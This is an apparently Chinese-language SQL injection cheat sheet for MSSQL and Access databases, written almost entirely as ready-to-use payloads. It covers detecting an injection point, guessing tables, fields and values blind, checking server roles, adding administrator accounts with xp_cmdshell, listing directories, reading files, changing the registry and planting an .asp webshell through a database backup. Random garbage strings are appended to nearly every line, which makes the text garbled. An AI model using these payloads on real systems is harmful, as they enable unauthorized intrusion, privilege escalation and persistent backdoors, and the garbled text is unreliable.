1.判断是否有注入;and 1=1 ;and 1=2 q}(UC1|
2.初步判断是否是mssql ;and user>0 fz,8 <
H@OYtPHGR
3.注入参数是字符'and [查询条件] and ''=' ~I2IgEj>]
bCc^)o/w
4.搜索时没过滤参数的'and [查询条件] and '%25'=' QNn$`Qz.
S1zV.]
5.判断数据库系统 !%]]lxi
%vyjn&13
;and (select count(*) from sysobjects)>0 mssql <gJ|Wee
m<r.sq&;
;and (select count(*) from msysobjects)>0 access ~"{Kjr#R
e>"{nOY4
0
R^Xn
HOXqIZN85
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ~pwp B2c
yS lN|8d
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 =7#)8p[
v-&^G3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 c5^i5de
4B!]%Mw;c
9.(1)猜字段的ascii值(access) BL,YJM(y
)%WS(S>8
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ,I'Y)SLx
\y#gh95
(2)猜字段的ascii值(mssql) Pxy(YMv
=suj3.
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 8v c4J5
q'{E $V)E
10.测试权限结构(mssql) tUL(1:-C
$wC]S4C
wGAN"K:e
/ ijj;9EB
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- oP_'0h0X
Y{um1)k
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 0Tg/R4dI
LWf+H 4iZ}
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- yD5T'np<4
+-`Q}~s+
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- c\"oj&>A
t$rWE|+_z
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- e2 Ba@e-
Z}$.Tm
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- RG #
7$;mkHu4H%
;and 1=(select IS_MEMBER('db_owner'));-- 0;r+E*`DA
]r6,^"
(F~eknJ
T?NwSxGo
11.添加mssql和系统的帐户 q'd6\G0}
3fn6W)v?
;exec master.dbo.sp_addlogin username;-- 's!EAqCN
;exec master.dbo.sp_password null,username,password;-- {v<Ig{{V
aW$7:<A{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- GfPe0&h
Ku 56TH!Py
;exec master.dbo.xp_cmdshell 'net user username password Dy0cA| E
cA AJ7?
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Vg&`f
`{8Sr)
;exec master.dbo.xp_cmdshell 'net user username password /add';-- o+q4Vg9&
//f[%j*>
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- fHR1kuy
w,9$*=k
X62z>mM
4|7L26,]5
12.(1)遍历目录 N{
;{<C9Z
Y |n_Ro^~
;create table dirs(paths varchar(100), id int) Fl^.J<Dz
!Kd/
lDY
;insert dirs exec master.dbo.xp_dirtree 'c:\' :n{rVn}G
@ U:WWTzf
;and (select top 1 paths from dirs)>0 Q/-YLf.
wzT+V,
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) __'Z0?.4#
+#,t
auaFP-$`f
~\Fde^1
(2)遍历目录 &I <R|a
W)$;T%u
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- o7&Z4(V
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 pBh[F5
J6rXbui$
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Nr6YQH*[
rOS fDv
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 c[@>#7p`o
xL=g(FN(6L
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 U~!97,|ic
fh:=ja?bM3
X
NnsMl
`p*7MZ9-
13.mssql中的存储过程 mWta B>f
31<hn+pE&
xp_regenumvalues 注册表根键, 子键 : :e=6i
nS]/=xP{
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 BDD^*Y
,N5Rdgzk
xp_regread 根键,子键,键值名 A\.k['!
<@(HQuL#
;exec xp_regread JwxI8Pi*y
N
y7VIh|
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 a}El!7RO0
pjrVPi5&t
xp_regwrite 根键,子键, 值名, 值类型, 值 x.>z2.
Kx ?}%@b
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ] l}8
hRtnO|Z6
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 L'z;*N3D
,dK% [
xp_regdeletevalue 根键,子键,值名 G2
xYa$&][
eNi.d;8F
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 %ktU 51o
Y')in7g
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ukzXQe;l1
W~Eq_J?I
nYTI\f/8v
=r:D]?8oC
14.mssql的backup创建webshell f+-w~cN
YdhrFw0`~r
use model /M\S^!g@
&.K=,+0_R/
create table cmd(str image); /,c9&it(M
m 9.QGX\]
insert into cmd(str) values (''); (y=P-nm
UOT~L4G
backup database model to disk='c:\l.asp'; 6TlkPM$~2
'hg, W]
ib;:*
c]t=#
15.mssql内置函数 nke[}Hqf
}eULcgRG
;and (select @@version)>0 获得Windows的版本号 !@%m3)T8
e
J2wK3R
;and user_name()='dbo' 判断当前系统的连接用户是不是sa b6R0za
.#lQZo6$\|
;and (select user_name())>0 爆当前系统的连接用户 \/S?.P#L~
Gk'J'9*
;and (select db_name())>0 得到当前连接的数据库 ]C}z3hhk
*.ZV.(
8.'%wOU@A
/'!F \ kz
16.简洁的webshell f)?s.DvUB
po\Q Me
use model Z:u7`%
AIN_.=]"?
create table cmd(str image); ~^KemwogPN
%~}9#0h)
insert into cmd(str) values (''); `SFI\Y+WDT
7?Xfge%\
backup database model to disk='g:\wwwtest\l.asp';